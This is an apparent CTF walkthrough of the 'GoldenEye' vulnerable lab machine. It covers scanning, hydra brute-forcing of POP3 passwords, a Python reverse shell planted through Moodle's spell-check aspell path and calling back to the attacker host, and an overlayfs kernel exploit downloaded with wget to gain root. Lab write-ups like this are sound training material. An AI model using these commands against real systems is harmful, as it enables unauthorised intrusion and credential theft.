🛰️GoldenEye

This is an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. It is an Intermediate machine and has a good variety of techniques needed to get root with no exploit development/buffer overflows.

1. Reconnaissance

Scanning the network to find vulnerable machine's IP

arp-scan -l      

Interface: enp0s3, type: EN10MB, MAC: 08:00:27:9c:9d:c8, IPv4: 192.168.10.25
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:a6:93:3e	PCS Systemtechnik GmbH
192.168.10.26	08:00:27:3c:e6:8b	PCS Systemtechnik GmbH

We find the IP of the vulnerable machine to be 192.168.10.26

2. Scanning

2.1 Nmap

Using nmap to find the open ports and their services

nmap -Pn -p- -A 192.168.10.26  

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 09:48 IST
Nmap scan report for 192.168.10.26
Host is up (0.0022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
55006/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
55007/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: USER CAPA UIDL RESP-CODES SASL(PLAIN) TOP STLS PIPELINING AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:3C:E6:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   2.24 ms 192.168.10.26

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds

We find tcp ports 25 , 80, 55006and 55007 open with smtp, apache web server, a Dovecot mail server and pop3 running respectively.

`web-server`

Browsing over to the webpage

Here we are greeted with a super cool home page with a login path /sev-home provided for user login.
Viewing the source code of this page,

We can see that there is a javascript file terminal.js referenced.... Seems interesting.
Navigating to terminal.js , we find a message to Boris in the comments

We get 2 potential usernames Boris and Natalya and a url encoded password
Decoding the password InvincibleHack3r

InvincibleHack3r

`/sev-home`

Navigating to /sev-home, we get a login page

Using the credentials boris : InvincibleHack3 , we can login to the page

We can see an ode to the James Bond movie GoldenEye and a reference to their pop3 servers.This might be a hint.

2.2 Brute-forcing pop3 (Natalya)

We can use hydra to brute force the password of pop3 server of natalya using the word list /usr/share/wordlists/fasttrack.txt

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.10.26:55007

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-20 10:17:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.10.26:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.10.26   login: natalya   password: bird
[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-20 10:19:17

We get the credentials:

natalya : bird

2.3 Dumping mails via pop3 (Natalya)

We can use nc to access the pop3 server and login in with the credentials. Using the list command to show all the mails

nc 192.168.10.26 55007 

+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048

There are two mails sent to Natalya
Retrieving the 1st message

retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id D5EDA454B1
	for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

Nothing much interesting there, other than mention of boris' weak credentials
Retrieving the 2nd message

retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 17C96454B1
	for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is its related to security...even if its not, just enter it in under the guise of "security"...itll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didnt have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since youre a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

Here we get another set of credentials, for their inner domain severnaya-station.com/gnocertdir

xenia : RCP90rulez!

Adding severnaya-station.com to our hosts file as specified
Accessing http://severnaya-station.com/gnocertdir/login/index.php and logging in using the above credentials.

Navigating to the message folder

Navigation > Home > My profile > Messages > Recent conversations

We find a message from another potential user, doak

2.4 Brute-forcing pop3 (Doak)

Using hydra to brute force the password of pop3 server of doak using the word list /usr/share/wordlists/fasttrack.txt

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.10.26 -s 55007

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-20 10:35:08
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.10.26:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.10.26   login: doak   password: goat
[STATUS] attack finished for 192.168.10.26 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-20 10:37:25

We get the credentials:

doak : goat

2.5 Dumping mails via pop3 (Doak)

We can again use nc to access the pop3 server and login in with the credentials. Using the list command to show all the mails

nc 192.168.10.26 55007                                                                    2m 17s root@j0zack
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606

There is one mail
Retreiving it;

retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 97DC24549D
	for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If youre reading this, congrats youve gotten this far. You know how tradecraft works right?

Because I dont. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

We get doak's login credentilas

dr_doak : 4England!

Logging in as dr_doak

Navigating to private files

Navigation > Home > My profile > My private files

There is a s3cret.txt for James
Viewing s3cret.txt

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

From the message, we can conclude that the sender was able to capture the admin credentials over clear text.
We are given another location where we find an image file. Maybe, the credentials are obfuscated in it?

2.6 Reading hidden data from image

Downloading the image using wget

wget http://192.168.10.26/dir007key/for-007.jpg

--2022-04-20 10:47:23--  http://192.168.10.26/dir007key/for-007.jpg
Connecting to 192.168.10.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’

for-007.jpg                             100%[=============================================================================>]  14.55K  --.-KB/s    in 0s      

2022-04-20 10:47:23 (353 MB/s) - ‘for-007.jpg’ saved [14896/14896]

Steganography is the practice of concealing a message within another message or a physical object.
We can use strings to find out any data hidden in the image.

strings for-007.jpg 

JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
             !      !!!   !!!!!!!!"""""""""""""""
-------------------------------------------------------------------

We find a base64 encoded string in the file eFdpbnRlcjE5OTV4IQ==
Decoding it,

echo eFdpbnRlcjE5OTV4IQ== | base64 -d                                                            
xWinter1995x!

We get a potential password for admin

admin : xWinter1995x!

Using these credentials, we get access to the admin interface

3. Initial Foothold

3.1 Reverse shell

Here, we are going to get a reverse shell via the spell check functionality

Navigating to spell engine

Setting > Site administration > Plugins > text editors > TinyMCE HTML editor

Under spell engine, we need to change it to PSpellShell and save it.

Navigating to path to aspell

Setting > Site administration > Server > System paths

We need to modify the code of Path to aspell to include our reverse shell
Using python reverse shell from pentest mokey

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Pasting the code in Path to a spell (make sure to change IP and port) and saving it as well.

Navigating to Site blogs and adding a new entry

Home > Site pages > Site blogs

Starting an nc listener to capture our reverse connection

nc -lvnp 1234  

listening on [any] 1234 ...

Entering some random text in the Blog entry body field and using the spellcheck functionality to trigger our reverse shell script.

Stabilizing the shell

nc -lvnp 1234  

listening on [any] 1234 ...
connect to [192.168.10.25] from (UNKNOWN) [192.168.10.26] 39488
/bin/sh: 0: cant access tty; job control turned off

$ which python
/usr/bin/python

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$

4. Privilege Escalation

4.1 Kernal Exploit

Checking the version of the kernel using uname -a

www-data@ubuntu:/$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

We see that the system is using an outdated kernel
Searching for potential exploits

searchsploit Linux ubuntu 3.13.0-32
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loc | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loc | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write ( | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free          | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation        | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local  | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege E | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege E | linux/local/41760.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We find an overlayfs privilege escalation exploit 37292
Coping it over to our current directory,

searchsploit -m 37292   

  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /opt/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines

Copied to: ~/goldeneye/37292.c

Checking for an appropriate compiler to compile our exploit in our target system

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which gcc
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which cc
/usr/bin/cc

We find out that the target does not have a gcc compiler, instead it has cc
So we need to edit the source code of our exploit and change gcc to cc (line 143) in order to run it in our target system.(Even though we are compiling the exploit and then sending it to our target system, the compiled code can also give an error if the compiler is not present.)
Compiling the file as exploit and hosting it using python server

cc 37292.c -o exploit

python3 -m http.server 

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Downloading the exploit in the temp directory, making it executable and running it.

www-data@ubuntu:/$ cd /tmp 

www-data@ubuntu:/tmp$ wget http://192.168.10.25:8000/exploit

--2022-04-19 22:52:38--  http://192.168.10.25:8000/exploit
Connecting to 192.168.10.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21064 (21K) [application/octet-stream]
Saving to: 'exploit'

100%[======================================>] 21,064      --.-K/s   in 0.02s   

2022-04-19 22:52:38 (1.07 MB/s) - 'exploit' saved [21064/21064]

www-data@ubuntu:/tmp$ chmod +x exploit

www-data@ubuntu:/tmp$ ./exploit

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

whoami 
root

We are root
Viewing the flag which is hidden in the /root directory

cd /root
ls -la
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo

cat .flag.txt
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

http://192.168.10.26/006-final/xvf7-flag/

PreviousCrypto Bank NextHacker Fest

Last updated 3 years ago